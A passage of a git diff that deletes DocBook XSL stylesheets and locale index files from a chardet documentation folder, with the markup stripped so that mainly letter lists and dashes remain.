- Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/subtitles.xsl b/chardet/docs/docbook/xsl/common/subtitles.xsl deleted file mode 100644 index 2fabeda..0000000 --- a/chardet/docs/docbook/xsl/common/subtitles.xsl +++ /dev/null @@ -1,147 +0,0 @@ - - - - - - - - - - -Provides access to element subtitles - -Processing an element in the -subtitle.markup mode produces the -subtitle of the element. - - - - - - - Request for subtitle of unexpected element: - - - ???SUBTITLE??? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/sv.xml b/chardet/docs/docbook/xsl/common/sv.xml deleted file mode 100644 index ccf22d2..0000000 --- a/chardet/docs/docbook/xsl/common/sv.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/table.xsl b/chardet/docs/docbook/xsl/common/table.xsl deleted file mode 100644 index 0aa1559..0000000 --- a/chardet/docs/docbook/xsl/common/table.xsl +++ /dev/null @@ -1,441 +0,0 @@ - - - - - - - - - - - 0: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0: - - - : - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 0 - - - - -Determine the column number in which a given entry occurs - -If an entry has a -colname or -namest attribute, this template -will determine the number of the column in which the entry should occur. -For other entrys, nothing is returned. - - - -entry - -The entry-element which is to be tested. - - - - - - -This template returns the column number if it can be determined, -or 0 (the empty string) - - - - - - - - - - - - - - - - - - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/targetdatabase.dtd b/chardet/docs/docbook/xsl/common/targetdatabase.dtd deleted file mode 100644 index 13b72c4..0000000 --- a/chardet/docs/docbook/xsl/common/targetdatabase.dtd +++ /dev/null @@ -1,47 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/targets.xsl b/chardet/docs/docbook/xsl/common/targets.xsl deleted file mode 100644 index 6091653..0000000 --- a/chardet/docs/docbook/xsl/common/targets.xsl +++ /dev/null @@ -1,251 +0,0 @@ - - - - - - - - - - -Collects information for potential cross reference targets - -Processing the root element in the -collect.targets mode produces -a set of target database elements that can be used by -the olink mechanism to resolve external cross references. -The collection process is controlled by the -collect.xref.targets parameter, which can be -yes to collect targets and process -the document for output, only to -only collect the targets, and no -(default) to not collect the targets and only process the document. - - -A targets.filename parameter must be -specified to receive the output if -collect.xref.targets is -set to yes so as to -redirect the target data to a file separate from the -document output. - - - - - - - - - - - Must specify a $targets.filename parameter when - $collect.xref.targets is set to 'yes'. - The xref targets were not collected. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    diff --git a/chardet/docs/docbook/xsl/common/th.xml b/chardet/docs/docbook/xsl/common/th.xml deleted file mode 100644 index 144c1d8..0000000 --- a/chardet/docs/docbook/xsl/common/th.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á - Â - â - Ã - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/titles.xsl b/chardet/docs/docbook/xsl/common/titles.xsl deleted file mode 100644 index 5f1d983..0000000 --- a/chardet/docs/docbook/xsl/common/titles.xsl +++ /dev/null @@ -1,602 +0,0 @@ - - - - - - - - - - -Provides access to element titles - -Processing an element in the -title.markup mode produces the -title of the element. This does not include the label. - - - - - - - - - - - - - - - - - - - - - - Request for title of element with no title: - - - (id=" - - ") - - - - ???TITLE??? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - REFENTRY WITHOUT TITLE??? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Note - Important - Caution - Warning - Tip - - - - - - - - - - Question - - - - - Answer - - - - - Question - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/tr.xml b/chardet/docs/docbook/xsl/common/tr.xml deleted file mode 100644 index 03a9490..0000000 --- a/chardet/docs/docbook/xsl/common/tr.xml +++ /dev/null @@ -1,590 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Semboller - A - a - B - b - C - c - Ç - ç - D - d - E - e - F - f - G - g - Ğ - ğ - H - h - I - ı - İ - i - J - j - K - k - L - l - M - m - N - n - O - o - Ö - ö - P - p - R - r - S - s - Ş - ş - T - t - U - u - Ü - ü - V - v - Y - y - Z - z - - diff --git a/chardet/docs/docbook/xsl/common/uk.xml b/chardet/docs/docbook/xsl/common/uk.xml deleted file mode 100644 index bd66fe2..0000000 --- a/chardet/docs/docbook/xsl/common/uk.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á - Â - â - Ã - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/vi.xml b/chardet/docs/docbook/xsl/common/vi.xml deleted file mode 100644 index 28b82ab..0000000 --- a/chardet/docs/docbook/xsl/common/vi.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á - Â - â - Ã - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/xh.xml b/chardet/docs/docbook/xsl/common/xh.xml deleted file mode 100644 index cfc884e..0000000 --- a/chardet/docs/docbook/xsl/common/xh.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á - Â - â - Ã - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - 